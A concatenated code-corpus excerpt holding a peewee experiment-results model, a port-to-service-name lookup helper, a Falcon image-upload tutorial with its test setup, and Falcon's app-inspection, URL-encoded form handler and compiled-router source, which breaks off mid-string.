total_time_sec = FloatField(null=True)
circuit_size = IntegerField(null=True)
memory_mb = FloatField(null=True)
is_realizable = CharField()
model = TextField(null=True)
input_file = CharField()
logs = TextField(null=True)
tool_params = CharField()
exp = CharField()
commit = CharField(null=True)
hardware = CharField(null=True)
datetime = DateTimeField(null=True)
note = CharField(null=True)
time_limit_sec = FloatField(null=True)
memory_limit_mb = FloatField(null=True)
def __init__(self,
exp_desc:ExpDesc,
timed_run_params:TimedRunParams, tool_run_params:ToolRunParams,
run_result:RunResult,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.total_time_sec = run_result.total_time_sec
self.circuit_size = run_result.circuit_size
self.memory_mb = run_result.memory_mb
self.is_realizable = run_result.is_realizable
self.model = run_result.model
self.input_file = tool_run_params.input_file
self.logs = readfile(tool_run_params.log_file) if tool_run_params.log_file else ''
self.tool_params = tool_run_params.params
self.exp = exp_desc.exp_name
self.commit = exp_desc.commit
self.hardware = exp_desc.hardware
self.datetime = exp_desc.datetime
self.note = exp_desc.note
self.time_limit_sec = timed_run_params.time_limit_sec
self.memory_limit_mb = timed_run_params.memory_limit_mb
def __add_static_fields_RunRecord(adhoc_fields_:Iterable[FieldDesc]):
for f_desc in adhoc_fields_:
f_desc.db_field.add_to_class(RunRecord, f_desc.name)
def __add_object_fields_RunRecord(rr:RunRecord, adhoc_data:dict):
""" :arg adhoc_data: dict{field_name -> field python value}"""
for name, value in adhoc_data.items():
setattr(rr, name, value)
def upload_run(exp_desc:ExpDesc,
timed_run_params:TimedRunParams,
tool_run_params:ToolRunParams,
run_result:RunResult,
adhoc_data:dict):
logging.info('data_uploader.upload_record')
logging.debug('run_result=' + str(run_result))
RunRecord._meta.db_table = exp_desc.exp_name
with database.transaction():
rr = RunRecord(exp_desc, timed_run_params, tool_run_params, run_result)
__add_object_fields_RunRecord(rr, adhoc_data)
rr.save()
def create_table(table_name):
""" Fails if table 'table_name' already exists. """
logging.info('create_table: ' + table_name)
RunRecord._meta.db_table = table_name # TODO: not clear: should you restore the old name?
database.connect()
database.create_table(RunRecord)
database.close()
def table_exists(table_name):
old_name = RunRecord._meta.db_table
RunRecord._meta.db_table = table_name
result = RunRecord.table_exists()
RunRecord._meta.db_table = old_name
return result
__add_static_fields_RunRecord(adhoc_fields)
``` |
{
"source": "5O00/Simple-Port-Scanner",
"score": 3
} |
#### File: Simple-Port-Scanner/Scanner_app/ServPort.py
```python
import socket
def ServerOnPort(Number_Port, Protocol):
ServiceName = socket.getservbyport(Number_Port, Protocol)
print("[+] port number %d : %s"%(Number_Port, ServiceName))
``` |
{
"source": "5onic/falcon",
"score": 2
} |
#### File: look/look/images.py
```python
import io
import mimetypes
import os
import uuid
import falcon
import msgpack
class Resource:
def __init__(self, image_store):
self._image_store = image_store
def on_get(self, req, resp):
doc = {
'images': [
{
'href': '/images/1eaf6ef1-7f2d-4ecc-a8d5-6e8adba7cc0e.png'
}
]
}
resp.data = msgpack.packb(doc, use_bin_type=True)
resp.content_type = 'application/msgpack'
resp.status = falcon.HTTP_200
def on_post(self, req, resp):
name = self._image_store.save(req.stream, req.content_type)
resp.status = falcon.HTTP_201
resp.location = '/images/' + name
class ImageStore:
_CHUNK_SIZE_BYTES = 4096
# Note the use of dependency injection for standard library
# methods. We'll use these later to avoid monkey-patching.
def __init__(self, storage_path, uuidgen=uuid.uuid4, fopen=io.open):
self._storage_path = storage_path
self._uuidgen = uuidgen
self._fopen = fopen
def save(self, image_stream, image_content_type):
ext = mimetypes.guess_extension(image_content_type)
name = '{uuid}{ext}'.format(uuid=self._uuidgen(), ext=ext)
image_path = os.path.join(self._storage_path, name)
with self._fopen(image_path, 'wb') as image_file:
while True:
chunk = image_stream.read(self._CHUNK_SIZE_BYTES)
if not chunk:
break
image_file.write(chunk)
return name
```
#### File: look/tests/conftest.py
```python
import os
import subprocess
import time
import requests
LOOK_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
gunicorn = None
def pytest_sessionstart(session):
global gunicorn
gunicorn = subprocess.Popen(
('gunicorn', '--pythonpath', LOOK_PATH, 'look.app:get_app()'),
env=dict(os.environ, LOOK_STORAGE_PATH='/tmp'),
)
# NOTE(vytas): give Gunicorn some time to start.
for attempt in range(3):
try:
requests.get('http://1172.16.17.32/images', timeout=1)
break
except requests.exceptions.RequestException:
pass
time.sleep(0.2)
def pytest_sessionfinish(session, exitstatus):
gunicorn.terminate()
gunicorn.communicate()
```
#### File: falcon/falcon/inspect.py
```python
from functools import partial
import inspect
from typing import Callable, Dict, List, Optional, Type
from falcon import App, app_helpers
from falcon.routing import CompiledRouter
def inspect_app(app: App) -> 'AppInfo':
"""Inspects an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
AppInfo: The information regarding the application. Call
:meth:`~.AppInfo.to_string` on the result to obtain a human-friendly
representation.
"""
routes = inspect_routes(app)
static = inspect_static_routes(app)
sinks = inspect_sinks(app)
error_handlers = inspect_error_handlers(app)
middleware = inspect_middlewares(app)
return AppInfo(routes, middleware, static, sinks, error_handlers, app._ASGI)
def inspect_routes(app: App) -> 'List[RouteInfo]':
"""Inspects the routes of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[RouteInfo]: A list of route descriptions for the application.
"""
router = app._router
inspect_function = _supported_routers.get(type(router))
if inspect_function is None:
raise TypeError(
'Unsupported router class {}. Use "register_router" '
'to register a function that can inspect the router '
'used by the provided application'.format(type(router))
)
return inspect_function(router)
def register_router(router_class):
"""Register a function to inspect a particular router.
This decorator registers a new function for a custom router
class, so that it can be inspected with the function
:func:`.inspect_routes`.
An inspection function takes the router instance used by the
application and returns a list of :class:`.RouteInfo`. Eg::
@register_router(MyRouterClass)
def inspect_my_router(router):
return [RouteInfo('foo', 'bar', '/path/to/foo.py:42', [])]
Args:
router_class (Type): The router class to register. If
already registered an error will be raised.
"""
def wraps(fn):
if router_class in _supported_routers:
raise ValueError(
'Another function is already registered'
' for the router {}'.format(router_class)
)
_supported_routers[router_class] = fn
return fn
return wraps
# router inspection registry
_supported_routers = {} # type: Dict[Type, Callable]
def inspect_static_routes(app: App) -> 'List[StaticRouteInfo]':
"""Inspects the static routes of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[StaticRouteInfo]: A list of static routes that have
been added to the application.
"""
routes = []
for sr in app._static_routes:
info = StaticRouteInfo(sr._prefix, sr._directory, sr._fallback_filename)
routes.append(info)
return routes
def inspect_sinks(app: App) -> 'List[SinkInfo]':
"""Inspects the sinks of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[SinkInfo]: A list of sinks used by the application.
"""
sinks = []
for prefix, sink in app._sinks:
source_info, name = _get_source_info_and_name(sink)
info = SinkInfo(prefix.pattern, name, source_info)
sinks.append(info)
return sinks
def inspect_error_handlers(app: App) -> 'List[ErrorHandlerInfo]':
"""Inspects the error handlers of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[ErrorHandlerInfo]: A list of error handlers used by the
application.
"""
errors = []
for exc, fn in app._error_handlers.items():
source_info, name = _get_source_info_and_name(fn)
info = ErrorHandlerInfo(exc.__name__, name, source_info, _is_internal(fn))
errors.append(info)
return errors
def inspect_middlewares(app: App) -> 'MiddlewareInfo':
"""Inspects the middleware components of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
MiddlewareInfo: Information about the app's middleware components.
"""
types_ = app_helpers.prepare_middleware(app._unprepared_middleware, True, app._ASGI)
type_infos = []
for stack in types_:
current = []
for method in stack:
_, name = _get_source_info_and_name(method)
cls = type(method.__self__)
_, cls_name = _get_source_info_and_name(cls)
current.append(MiddlewareTreeItemInfo(name, cls_name))
type_infos.append(current)
middlewareTree = MiddlewareTreeInfo(*type_infos)
middlewareClasses = []
names = 'Process request', 'Process resource', 'Process response'
for m in app._unprepared_middleware:
fns = app_helpers.prepare_middleware([m], True, app._ASGI)
class_source_info, cls_name = _get_source_info_and_name(type(m))
methods = []
for method, name in zip(fns, names):
if method:
real_func = method[0]
source_info = _get_source_info(real_func)
methods.append(MiddlewareMethodInfo(real_func.__name__, source_info))
m_info = MiddlewareClassInfo(cls_name, class_source_info, methods)
middlewareClasses.append(m_info)
return MiddlewareInfo(
middlewareTree, middlewareClasses, app._independent_middleware
)
@register_router(CompiledRouter)
def inspect_compiled_router(router: CompiledRouter) -> 'List[RouteInfo]':
"""Walk an instance of :class:`~.CompiledRouter` to return a list of defined routes.
Default route inspector for CompiledRouter.
Args:
router (CompiledRouter): The router to inspect.
Returns:
List[RouteInfo]: A list of :class:`~.RouteInfo`.
"""
def _traverse(roots, parent):
for root in roots:
path = parent + '/' + root.raw_segment
if root.resource is not None:
methods = []
if root.method_map:
for method, func in root.method_map.items():
if isinstance(func, partial):
real_func = func.func
else:
real_func = func
source_info = _get_source_info(real_func)
internal = _is_internal(real_func)
method_info = RouteMethodInfo(
method, source_info, real_func.__name__, internal
)
methods.append(method_info)
source_info, class_name = _get_source_info_and_name(root.resource)
route_info = RouteInfo(path, class_name, source_info, methods)
routes.append(route_info)
if root.children:
_traverse(root.children, path)
routes = [] # type: List[RouteInfo]
_traverse(router._roots, '')
return routes
# ------------------------------------------------------------------------
# Inspection classes
# ------------------------------------------------------------------------
class _Traversable:
__visit_name__ = 'N/A'
def to_string(self, verbose=False, internal=False) -> str:
"""Return a string representation of this class.
Args:
verbose (bool, optional): Adds more information. Defaults to False.
internal (bool, optional): Also include internal route methods
and error handlers added by the framework. Defaults to
``False``.
Returns:
str: string representation of this class.
"""
return StringVisitor(verbose, internal).process(self)
def __repr__(self):
return self.to_string()
class RouteMethodInfo(_Traversable):
"""Describes a responder method.
Args:
method (str): The HTTP method of this responder.
source_info (str): The source path of this function.
function_name (str): Name of the function.
internal (bool): Whether or not this was a default responder added
by the framework.
Attributes:
suffix (str): The suffix of this route function. This is set to an empty
string when the function has no suffix.
"""
__visit_name__ = 'route_method'
def __init__(
self, method: str, source_info: str, function_name: str, internal: bool
):
self.method = method
self.source_info = source_info
self.function_name = function_name
self.internal = internal
# NOTE(CaselIT): internal falcon names do not start with on and do not have suffix
if function_name.startswith('on'):
self.suffix = '_'.join(function_name.split('_')[2:])
else:
self.suffix = ''
class RouteInfo(_Traversable):
"""Describes a route.
Args:
path (str): The path of this route.
class_name (str): The class name of the responder of this route.
source_info (str): The source path where this responder was defined.
methods (List[RouteMethodInfo]): List of methods defined in the route.
"""
__visit_name__ = 'route'
def __init__(
self,
path: str,
class_name: str,
source_info: str,
methods: List[RouteMethodInfo],
):
self.path = path
self.class_name = class_name
self.source_info = source_info
self.methods = methods
class StaticRouteInfo(_Traversable):
"""Describes a static route.
Args:
path (str): The prefix of the static route.
directory (str): The directory for the static route.
fallback_filename (str or None): Fallback filename to serve.
"""
__visit_name__ = 'static_route'
def __init__(self, prefix: str, directory: str, fallback_filename: Optional[str]):
self.prefix = prefix
self.directory = directory
self.fallback_filename = fallback_filename
class SinkInfo(_Traversable):
"""Describes a sink.
Args:
prefix (str): The prefix of the sink.
name (str): The name of the sink function or class.
source_info (str): The source path where this sink was defined.
"""
__visit_name__ = 'sink'
def __init__(self, prefix: str, name: str, source_info: str):
self.prefix = prefix
self.name = name
self.source_info = source_info
class ErrorHandlerInfo(_Traversable):
"""Desribes an error handler.
Args:
error (name): The name of the error type.
name (str): The name of the handler.
source_info (str): The source path where this error handler was defined.
internal (bool): Whether or not this is a default error handler added by
the framework.
"""
__visit_name__ = 'error_handler'
def __init__(self, error: str, name: str, source_info: str, internal: bool):
self.error = error
self.name = name
self.source_info = source_info
self.internal = internal
class MiddlewareMethodInfo(_Traversable):
"""Describes a middleware method.
Args:
function_name (str): Name of the method.
source_info (str): The source path of the method.
"""
__visit_name__ = 'middleware_method'
def __init__(self, function_name: str, source_info: str):
self.function_name = function_name
self.source_info = source_info
self.internal = False # added for compatibility with RouteMethodInfo
class MiddlewareClassInfo(_Traversable):
"""Describes a middleware class.
Args:
name (str): The name of the middleware class.
source_info (str): The source path where the middleware was defined.
methods (List[MiddlewareMethodInfo]): List of method defined by the middleware class.
"""
__visit_name__ = 'middleware_class'
def __init__(
self, name: str, source_info: str, methods: List[MiddlewareMethodInfo]
):
self.name = name
self.source_info = source_info
self.methods = methods
class MiddlewareTreeItemInfo(_Traversable):
"""Describes a middleware tree entry.
Args:
name (str): The name of the method.
class_name (str): The class name of the method.
"""
__visit_name__ = 'middleware_tree_item'
_symbols = {
'process_request': '→',
'process_resource': '↣',
'process_response': '↢',
}
def __init__(self, name: str, class_name: str):
self.name = name
self.class_name = class_name
class MiddlewareTreeInfo(_Traversable):
"""Describes the middleware methods used by the app.
Args:
request (List[MiddlewareTreeItemInfo]): The `process_request` methods.
resource (List[MiddlewareTreeItemInfo]): The `process_resource` methods.
response (List[MiddlewareTreeItemInfo]): The `process_response` methods.
"""
__visit_name__ = 'middleware_tree'
def __init__(
self,
request: List[MiddlewareTreeItemInfo],
resource: List[MiddlewareTreeItemInfo],
response: List[MiddlewareTreeItemInfo],
):
self.request = request
self.resource = resource
self.response = response
class MiddlewareInfo(_Traversable):
"""Describes the middleware of the app.
Args:
middlewareTree (MiddlewareTreeInfo): The middleware tree of the app.
middlewareClasses (List[MiddlewareClassInfo]): The middleware classes of the app.
independent (bool): Whether or not the middleware components are executed
independently.
Attributes:
independent_text (str): Text created from the `independent` arg.
"""
__visit_name__ = 'middleware'
def __init__(
self,
middleware_tree: MiddlewareTreeInfo,
middleware_classes: List[MiddlewareClassInfo],
independent: bool,
):
self.middleware_tree = middleware_tree
self.middleware_classes = middleware_classes
self.independent = independent
if independent:
self.independent_text = 'Middleware are independent'
else:
self.independent_text = 'Middleware are dependent'
class AppInfo(_Traversable):
"""Describes an application.
Args:
routes (List[RouteInfo]): The routes of the application.
middleware (MiddlewareInfo): The middleware information in the application.
static_routes (List[StaticRouteInfo]): The static routes of this application.
sinks (List[SinkInfo]): The sinks of this application.
error_handlers (List[ErrorHandlerInfo]): The error handlers of this application.
asgi (bool): Whether or not this is an ASGI application.
"""
__visit_name__ = 'app'
def __init__(
self,
routes: List[RouteInfo],
middleware: MiddlewareInfo,
static_routes: List[StaticRouteInfo],
sinks: List[SinkInfo],
error_handlers: List[ErrorHandlerInfo],
asgi: bool,
):
self.routes = routes
self.middleware = middleware
self.static_routes = static_routes
self.sinks = sinks
self.error_handlers = error_handlers
self.asgi = asgi
def to_string(self, verbose=False, internal=False, name='') -> str:
"""Return a string representation of this class.
Args:
verbose (bool, optional): Adds more information. Defaults to False.
internal (bool, optional): Also include internal falcon route methods
and error handlers. Defaults to ``False``.
name (str, optional): The name of the application, to be output at the
beginning of the text. Defaults to ``'Falcon App'``.
Returns:
str: A string representation of the application.
"""
return StringVisitor(verbose, internal, name).process(self)
# ------------------------------------------------------------------------
# Visitor classes
# ------------------------------------------------------------------------
class InspectVisitor:
"""Base visitor class that implements the `process` method.
Subclasses must implement ``visit_<name>`` methods for each supported class.
"""
def process(self, instance: _Traversable):
"""Process the instance, by calling the appropriate visit method.
Uses the `__visit_name__` attribute of the `instance` to obtain the method to use.
Args:
instance (_Traversable): The instance to process.
"""
try:
return getattr(self, 'visit_{}'.format(instance.__visit_name__))(instance)
except AttributeError as e:
raise RuntimeError(
'This visitor does not support {}'.format(type(instance))
) from e
class StringVisitor(InspectVisitor):
"""Visitor that returns a string representation of the info class.
This is used automatically by calling ``to_string()`` on the info class.
It can also be used directly by calling ``StringVisitor.process(info_instance)``.
Args:
verbose (bool, optional): Adds more information. Defaults to ``False``.
internal (bool, optional): Also include internal route methods
and error handlers added by the framework. Defaults to ``False``.
name (str, optional): The name of the application, to be output at the
beginning of the text. Defaults to ``'Falcon App'``.
"""
def __init__(self, verbose=False, internal=False, name=''):
self.verbose = verbose
self.internal = internal
self.name = name
self.indent = 0
@property
def tab(self):
"""Get the current tabulation."""
return ' ' * self.indent
def visit_route_method(self, route_method: RouteMethodInfo) -> str:
"""Visit a RouteMethodInfo instance. Usually called by `process`."""
text = '{0.method} - {0.function_name}'.format(route_method)
if self.verbose:
text += ' ({0.source_info})'.format(route_method)
return text
def _methods_to_string(self, methods: List):
"""Return a string from the list of methods."""
tab = self.tab + ' ' * 3
methods = _filter_internal(methods, self.internal)
if not methods:
return ''
text_list = [self.process(m) for m in methods]
method_text = ['{}├── {}'.format(tab, m) for m in text_list[:-1]]
method_text += ['{}└── {}'.format(tab, m) for m in text_list[-1:]]
return '\n'.join(method_text)
def visit_route(self, route: RouteInfo) -> str:
"""Visit a RouteInfo instance. Usually called by `process`."""
text = '{0}⇒ {1.path} - {1.class_name}'.format(self.tab, route)
if self.verbose:
text += ' ({0.source_info})'.format(route)
method_text = self._methods_to_string(route.methods)
if not method_text:
return text
return '{}:\n{}'.format(text, method_text)
def visit_static_route(self, static_route: StaticRouteInfo) -> str:
"""Visit a StaticRouteInfo instance. Usually called by `process`."""
text = '{0}↦ {1.prefix} {1.directory}'.format(self.tab, static_route)
if static_route.fallback_filename:
text += ' [{0.fallback_filename}]'.format(static_route)
return text
def visit_sink(self, sink: SinkInfo) -> str:
"""Visit a SinkInfo instance. Usually called by `process`."""
text = '{0}⇥ {1.prefix} {1.name}'.format(self.tab, sink)
if self.verbose:
text += ' ({0.source_info})'.format(sink)
return text
def visit_error_handler(self, error_handler: ErrorHandlerInfo) -> str:
"""Visit a ErrorHandlerInfo instance. Usually called by `process`."""
text = '{0}⇜ {1.error} {1.name}'.format(self.tab, error_handler)
if self.verbose:
text += ' ({0.source_info})'.format(error_handler)
return text
def visit_middleware_method(self, middleware_method: MiddlewareMethodInfo) -> str:
"""Visit a MiddlewareMethodInfo instance. Usually called by `process`."""
text = '{0.function_name}'.format(middleware_method)
if self.verbose:
text += ' ({0.source_info})'.format(middleware_method)
return text
def visit_middleware_class(self, middleware_class: MiddlewareClassInfo) -> str:
"""Visit a ErrorHandlerInfo instance. Usually called by `process`."""
text = '{0}↣ {1.name}'.format(self.tab, middleware_class)
if self.verbose:
text += ' ({0.source_info})'.format(middleware_class)
method_text = self._methods_to_string(middleware_class.methods)
if not method_text:
return text
return '{}:\n{}'.format(text, method_text)
def visit_middleware_tree_item(self, mti: MiddlewareTreeItemInfo) -> str:
"""Visit a MiddlewareTreeItemInfo instance. Usually called by `process`."""
symbol = mti._symbols.get(mti.name, '→')
return '{0}{1} {2.class_name}.{2.name}'.format(self.tab, symbol, mti)
def visit_middleware_tree(self, m_tree: MiddlewareTreeInfo) -> str:
"""Visit a MiddlewareTreeInfo instance. Usually called by `process`."""
before = len(m_tree.request) + len(m_tree.resource)
after = len(m_tree.response)
if before + after == 0:
return ''
each = 2
initial = self.indent
if after > before:
self.indent += each * (after - before)
text = []
for r in m_tree.request:
text.append(self.process(r))
self.indent += each
if text:
text.append('')
for r in m_tree.resource:
text.append(self.process(r))
self.indent += each
if m_tree.resource or not text:
text.append('')
self.indent += each
text.append('{}├── Process route responder'.format(self.tab))
self.indent -= each
if m_tree.response:
text.append('')
for r in m_tree.response:
self.indent -= each
text.append(self.process(r))
self.indent = initial
return '\n'.join(text)
def visit_middleware(self, middleware: MiddlewareInfo) -> str:
"""Visit a MiddlewareInfo instance. Usually called by `process`."""
text = self.process(middleware.middleware_tree)
if self.verbose:
self.indent += 4
m_text = '\n'.join(self.process(m) for m in middleware.middleware_classes)
self.indent -= 4
if m_text:
text += '\n{}- Middlewares classes:\n{}'.format(self.tab, m_text)
return text
def visit_app(self, app: AppInfo) -> str:
"""Visit a AppInfo instance. Usually called by `process`."""
type_ = 'ASGI' if app.asgi else 'WSGI'
self.indent = 4
text = '{} ({})'.format(self.name or 'Falcon App', type_)
if app.routes:
routes = '\n'.join(self.process(r) for r in app.routes)
text += '\n• Routes:\n{}'.format(routes)
middleware_text = self.process(app.middleware)
if middleware_text:
text += '\n• Middleware ({}):\n{}'.format(
app.middleware.independent_text, middleware_text
)
if app.static_routes:
static_routes = '\n'.join(self.process(sr) for sr in app.static_routes)
text += '\n• Static routes:\n{}'.format(static_routes)
if app.sinks:
sinks = '\n'.join(self.process(s) for s in app.sinks)
text += '\n• Sinks:\n{}'.format(sinks)
errors = _filter_internal(app.error_handlers, self.internal)
if errors:
errs = '\n'.join(self.process(e) for e in errors)
text += '\n• Error handlers:\n{}'.format(errs)
return text
# ------------------------------------------------------------------------
# Helpers functions
# ------------------------------------------------------------------------
def _get_source_info(obj, default='[unknown file]'):
"""Try to get the definition file and line of obj.
Return default on error.
"""
try:
source_file = inspect.getsourcefile(obj)
source_lines = inspect.findsource(obj)
source_info = '{}:{}'.format(source_file, source_lines[1])
except Exception:
# NOTE(vytas): If Falcon is cythonized, all default
# responders coming from cythonized modules will
# appear as built-in functions, and raise a
# TypeError when trying to locate the source file.
source_info = default
return source_info
def _get_source_info_and_name(obj):
"""Attempt to get the definition file and line of obj and its name."""
source_info = _get_source_info(obj, None)
if source_info is None:
# NOTE(caselit): a class instances return None. Try the type
source_info = _get_source_info(type(obj))
name = getattr(obj, '__name__', None)
if name is None:
name = getattr(type(obj), '__name__', '[unknown]')
return source_info, name
def _is_internal(obj):
"""Check if the module of the object is a falcon module."""
module = inspect.getmodule(obj)
if module:
return module.__name__.startswith('falcon.')
return False
def _filter_internal(iterable, return_internal):
"""Filter the internal elements of an iterable."""
if return_internal:
return iterable
return [el for el in iterable if not el.internal]
```
#### File: falcon/media/urlencoded.py
```python
from urllib.parse import urlencode
from falcon.media.base import BaseHandler
from falcon.util.uri import parse_query_string
class URLEncodedFormHandler(BaseHandler):
"""
URL-encoded form data handler.
This handler parses ``application/x-www-form-urlencoded`` HTML forms to a
``dict`` in a similar way that URL query parameters are parsed.
Keyword Arguments:
keep_blank (bool): Whether to keep empty-string values from the form
when deserializing.
csv (bool): Whether to split comma-separated form values into list
when deserializing.
"""
def __init__(self, keep_blank=True, csv=False):
self.keep_blank = keep_blank
self.csv = csv
def serialize(self, media, content_type):
# NOTE(vytas): Setting doseq to True to mirror the parse_query_string
# behaviour.
return urlencode(media, doseq=True)
def deserialize(self, stream, content_type, content_length):
body = stream.read()
# NOTE(kgriffs): According to http://goo.gl/6rlcux the
# body should be US-ASCII. Enforcing this also helps
# catch malicious input.
body = body.decode('ascii')
return parse_query_string(body,
keep_blank=self.keep_blank,
csv=self.csv)
async def deserialize_async(self, stream, content_type, content_length):
body = await stream.read()
# NOTE(kgriffs): According to http://goo.gl/6rlcux the
# body should be US-ASCII. Enforcing this also helps
# catch malicious input.
body = body.decode('ascii')
return parse_query_string(body,
keep_blank=self.keep_blank,
csv=self.csv)
```
#### File: falcon/routing/compiled.py
```python
from collections import UserDict
from inspect import iscoroutinefunction
import keyword
import re
import textwrap
from threading import Lock
from falcon.routing import converters
from falcon.routing.util import map_http_methods, set_default_responders
from falcon.util.misc import is_python_func
from falcon.util.sync import _should_wrap_non_coroutines, wrap_sync_to_async
_TAB_STR = ' ' * 4
_FIELD_PATTERN = re.compile(
# NOTE(kgriffs): This disallows the use of the '}' character within
# an argstr. However, we don't really have a way of escaping
# curly brackets in URI templates at the moment, so users should
# see this as a similar restriction and so somewhat unsurprising.
#
# We may want to create a contextual parser at some point to
# work around this problem.
r'{((?P<fname>[^}:]*)((?P<cname_sep>:(?P<cname>[^}\(]*))(\((?P<argstr>[^}]*)\))?)?)}'
)
_IDENTIFIER_PATTERN = re.compile('[A-Za-z_][A-Za-z0-9_]*$')
class CompiledRouter:
"""Fast URI router which compiles its routing logic to Python code.
Generally you do not need to use this router class directly, as an
instance is created by default when the falcon.App class is initialized.
The router treats URI paths as a tree of URI segments and searches by
checking the URI one segment at a time. Instead of interpreting the route
tree for each look-up, it generates inlined, bespoke Python code to
perform the search, then compiles that code. This makes the route
processing quite fast.
The compilation process is delayed until the first use of the router (on the
first routed request) to reduce the time it takes to start the application.
This may noticeably delay the first response of the application when a large
number of routes have been added. When adding the last route
to the application a `compile` flag may be provided to force the router
to compile immediately, thus avoiding any delay for the first response.
Note:
When using a multi-threaded web server to host the application, it is
possible that multiple requests may be routed at the same time upon
startup. Therefore, the framework employs a lock to ensure that only a
single compilation of the decision tree is performed.
See also :meth:`.CompiledRouter.add_route`
"""
__slots__ = (
'_ast',
'_converter_map',
'_converters',
'_find',
'_finder_src',
'_options',
'_patterns',
'_return_values',
'_roots',
'_compile_lock',
)
def __init__(self):
self._ast = None
self._converters = None
self._finder_src = None
self._options = CompiledRouterOptions()
# PERF(kgriffs): This is usually an anti-pattern, but we do it
# here to reduce lookup time.
self._converter_map = self._options.converters.data
self._patterns = None
self._return_values = None
self._roots = []
# NOTE(caselit): set _find to the delayed compile method to ensure that
# compile is called when the router is first used
self._find = self._compile_and_find
self._compile_lock = Lock()
@property
def options(self):
return self._options
@property
def finder_src(self):
# NOTE(caselit): ensure that the router is actually compiled before
# returning the finder source, since the current value may be out of
# date
self.find('/')
return self._finder_src
def map_http_methods(self, resource, **kwargs):
"""Map HTTP methods (e.g., GET, POST) to methods of a resource object.
This method is called from :meth:`~.add_route` and may be overridden to
provide a custom mapping strategy.
Args:
resource (instance): Object which represents a REST resource.
The default maps the HTTP method ``GET`` to ``on_get()``,
``POST`` to ``on_post()``, etc. If any HTTP methods are not
supported by your resource, simply don't define the
corresponding request handlers, and Falcon will do the right
thing.
Keyword Args:
suffix (str): Optional responder name suffix for this route. If
a suffix is provided, Falcon will map GET requests to
``on_get_{suffix}()``, POST requests to ``on_post_{suffix}()``,
etc. In this way, multiple closely-related routes can be
mapped to the same resource. For example, a single resource
class can use suffixed responders to distinguish requests
for a single item vs. a collection of those same items.
Another class might use a suffixed responder to handle
a shortlink route in addition to the regular route for the
resource.
"""
return map_http_methods(resource, suffix=kwargs.get('suffix', None))
def add_route(self, uri_template, resource, **kwargs):
"""Add a route between a URI path template and a resource.
This method may be overridden to customize how a route is added.
Args:
uri_template (str): A URI template to use for the route
resource (object): The resource instance to associate with
the URI template.
Keyword Args:
suffix (str): Optional responder name suffix for this route. If
a suffix is provided, Falcon will map GET requests to
``on_get_{suffix}()``, POST requests to ``on_post_{suffix}()``,
etc. In this way, multiple closely-related routes can be
mapped to the same resource. For example, a single resource
class can use suffixed responders to distinguish requests
for a single item vs. a collection of those same items.
Another class might use a suffixed responder to handle
a shortlink route in addition to the regular route for the
resource.
compile (bool): Optional flag that can be used to compile the
routing logic on this call. By default, :class:`.CompiledRouter`
delays compilation until the first request is routed. This may
introduce a noticeable amount of latency when handling the first
request, especially when the application implements a large
number of routes. Setting `compile` to ``True`` when the last
route is added ensures that the first request will not be
delayed in this case (defaults to ``False``).
Note:
Always setting this flag to ``True`` may slow down the
addition of new routes when hundreds of them are added at
once. It is advisable to only set this flag to ``True`` when
adding the final route.
"""
# NOTE(kgriffs): falcon.asgi.App injects this private kwarg; it is
# only intended to be used internally.
asgi = kwargs.get('_asgi', False)
method_map = self.map_http_methods(resource, **kwargs)
set_default_responders(method_map, asgi=asgi)
if asgi:
self._require_coroutine_responders(method_map)
else:
self._require_non_coroutine_responders(method_map)
# NOTE(kgriffs): Fields may have whitespace in them, so sub
# those before checking the rest of the URI template.
if re.search(r'\s', _FIELD_PATTERN.sub('{FIELD}', uri_template)):
raise ValueError('URI templates may not include whitespace.')
path = uri_template.lstrip('/').split('/')
used_names = set()
for segment in path:
self._validate_template_segment(segment, used_names)
def insert(nodes, path_index=0):
for node in nodes:
segment = path[path_index]
if node.matches(segment):
path_index += 1
if path_index == len(path):
# NOTE(kgriffs): Override previous node
node.method_map = method_map
node.resource = resource
node.uri_template = uri_template
else:
insert(node.children, path_index)
return
if node.conflicts_with(segment):
msg = textwrap.dedent("""
The URI template for this route is inconsistent or conflicts with another
route's template. This is usually caused by configuring a field converter
differently for the same field in two different routes, or by using
different field names at the same level in the path (e.g.,
'/parents/{id}' and '/parents/{parent_id}/children')
""").strip().replace('\n', ' ')
raise ValueError(msg)
# NOTE(richardolsson): If we got this far, the node doesn't already
# exist and needs to be created. This builds a new branch of the
# routing tree recursively until it reaches the new node leaf.
new_node = CompiledRouterNode(path[path_index])
nodes.append(new_node)
if path_index == len(path) - 1:
new_node.method_map = method_map
new_node.resource = resource
new_node.uri_template = uri_template
else:
insert(new_node.children, path_index + 1)
insert(self._roots)
# NOTE(caselit): when compile is True run the actual compile step, otherwise reset the
# _find, so that _compile will be called on the next find use
if kwargs.get('compile', False):
self._find = self._compile()
else:
self._find = self._compile_and_find
def find(self, uri, req=None):
"""Search for a route that matches the given partial URI.
Args:
uri(str): The requested path to route.
Keyword Args:
req: The :class:`falcon.Request` or :class:`falcon.asgi.Request`
object that will be passed to the routed responder. Currently
the value of this argument is ignored by
:class:`~.CompiledRouter`. Routing is based solely on the path.
Returns:
tuple: A 4-member tuple composed of (resource, method_map,
params, uri_template), or ``None`` if no route matches
the requested path.
"""
path = uri.lstrip('/').split('/')
params = {}
node = self._find(path, self._return_values, self._patterns,
self._converters, params)
if node is not None:
return node.resource, node.method_map, params, node.uri_template
else:
return None
# -----------------------------------------------------------------
# Private
# -----------------------------------------------------------------
def _require_coroutine_responders(self, method_map):
for method, responder in method_map.items():
# NOTE(kgriffs): We don't simply wrap non-async functions
# since they likely peform relatively long blocking
# operations that need to be explicitly made non-blocking
# by the developer; raising an error helps highlight this
# issue.
if not iscoroutinefunction(responder) and is_python_func(responder):
if _should_wrap_non_coroutines():
def let(responder=responder):
method_map[method] = wrap_sync_to_async(responder)
let()
else:
msg = (
'The {} responder must be a non-blocking '
'async coroutine (i.e., defined using async def) to '
